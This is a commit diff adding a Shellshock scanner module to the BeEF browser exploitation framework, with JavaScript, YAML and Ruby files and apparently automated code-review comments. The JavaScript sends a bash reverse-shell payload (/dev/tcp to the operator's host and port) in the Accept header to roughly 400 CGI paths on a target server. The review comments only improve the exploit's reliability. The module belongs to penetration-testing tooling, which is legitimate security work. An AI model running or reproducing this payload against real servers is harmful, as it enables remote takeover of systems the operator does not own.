
Add Shell Shock Scanner module

bcoles committed Oct 30, 2014
1 parent fb57121 commit cc0993a2eb54ae865f5f41c2381cb981fedacff1
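--- a/modules/exploits/shell_shock_scanner/[filename not on page].js
+++ b/modules/exploits/shell_shock_scanner/[filename not on page].js
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+var rproto = '<%= @rproto %>';
+var rhost = '<%= @rhost %>';
+var rport = '<%= @rport %>';
+var lhost = '<%= @lhost %>';
+var lport = '<%= @lport %>';
+var target = rproto + '://' + rhost + ':' + rport;
+var method = '<%= @method %>';
+var wait = '<%= @wait %>';
+var timeout = '<%= @timeout %>';
+
+get_cgi = function(uri) {
+try {
+var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";
+var xhr = new XMLHttpRequest();
+xhr.open(method, target+uri, true);
+xhr.onload = function () {
+};
+xhr.onreadystatechange = function () {
+if (xhr.readyState == 4 && xhr.status == 200) {
+beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
+}
+}
+xhr.setRequestHeader("Accept", payload);
+xhr.send(null);
+} catch (e){
+beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
+}
+}
+
+var scripts = new Array(
+<%=
+scripts = []
+File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
+file_handle.each_line do |line|
+uri = line.chomp!
+next if uri =~ /^#/
+next if uri.nil?
+scripts << "'#{uri}'"
+end
+end
+scripts.shuffle.join(",\n")
+%>
+);
+
+// add scripts to queue
+var requests = [];
+for (var i=0; i<scripts.length; i++) requests.push(scripts[i]);
+
+// process queue
+beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan");
+var handle = setInterval(function() {
+if (requests.length > 0) {
+get_cgi(requests.pop());
+} else cleanup();
+}, wait*1000);
+
+// clean up
+cleanup = function() {
+if (handle) {
+beef.debug("Killing timer [ID: " + handle + "]");
+clearInterval(handle);
+handle = 0;
+beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
+}
+}
+setTimeout("cleanup();", timeout*1000);
+
+});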
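Review bot: The embedded Ruby that builds the script list uses `uri = line.chomp!`, and `chomp!` returns nil when nothing was removed, so a final list entry without a trailing newline is silently dropped by the `uri.nil?` guard, while blank lines survive as `''` and become a request to the bare target; `uri = line.chomp` followed by `next if uri.empty? || uri.start_with?('#')` handles both cases. `get_cgi` and `cleanup` are assigned without `var`, so they leak into the page's global scope, and `setTimeout("cleanup();", timeout*1000)` depends on that by evaluating a string; `var cleanup = function() {...}` together with `setTimeout(cleanup, timeout*1000)` removes both the implicit global and the string eval. `wait` and `timeout` are also injected as string literals and only coerced by `wait*1000`, so a non-numeric option value yields NaN, which in practice is treated as a 0 ms interval and the queue drains without any pacing; a `parseFloat` with a fallback, or validation on the Ruby side, would make the failure visible instead.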
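--- a/modules/exploits/shell_shock_scanner/[filename not on page].yaml
+++ b/modules/exploits/shell_shock_scanner/[filename not on page].yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+module:
+shell_shock_scanner:
+enable: true
+category: "Exploits"
+name: "Shell Shock Scanner (Reverse Shell)"
+description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.<br/>The list of CGI scripts was taken from <a href='https://github.com/nccgroup/shocker'>Shocker</a>."
+authors: ["Stephane Chazelas", "mz", "bmantra", "bcoles"]
+target:
+working: ["ALL"]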
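--- a/modules/exploits/shell_shock_scanner/[filename not on page].rb
+++ b/modules/exploits/shell_shock_scanner/[filename not on page].rb
@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Shell_shock_scanner < BeEF::Core::Command
+
+def self.options
+configuration = BeEF::Core::Configuration.instance
+lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+lhost = "" if lhost == "0.0.0.0"
+return [
+{ 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'GET' },
+{ 'name' => 'rproto',
+'type' => 'combobox',
+'ui_label' => 'Target Protocol',
+'store_type' => 'arraystore',
+'store_fields' => ['rproto'],
+'store_data' => [
+['http'],
+['https']
+],
+'emptyText' => 'Select a protocol (HTTP/HTTPS)',
+'valueField' => 'rproto',
+'displayField' => 'rproto',
+'mode' => 'local',
+'autoWidth' => true
+},
+{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
+{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
+{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' },
+{ 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' },
+{ 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'}
+]
+end
+
+def post_execute
+save({'result' => @datastore['result']})
+end
+
+end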
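Review bot: The `rproto` combobox in `self.options` is the only option without a `'value'` entry, so unless the operator explicitly picks a protocol the template presumably renders `@rproto` empty and the companion JavaScript builds its target as `://rhost:rport`; adding `'value' => 'http'` beside `'name' => 'rproto'` gives it the same default the other fields have. `rport`, `lport`, `wait` and `timeout` are free-text strings with no numeric check anywhere on this page, and the generated JavaScript interpolates them (and `rhost`) directly into single-quoted literals, so a stray quote in any of them breaks the script at runtime rather than failing here; coercing them with `Integer()`/`Float()` before dispatch, or at least noting in a comment that the JavaScript side relies on them being numeric, would make that contract explicit. The explicit `return [` is unnecessary since the array is already the method's last expression, and `'width'=>'100px'` lacks the spaces used around `=>` elsewhere in the literal.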
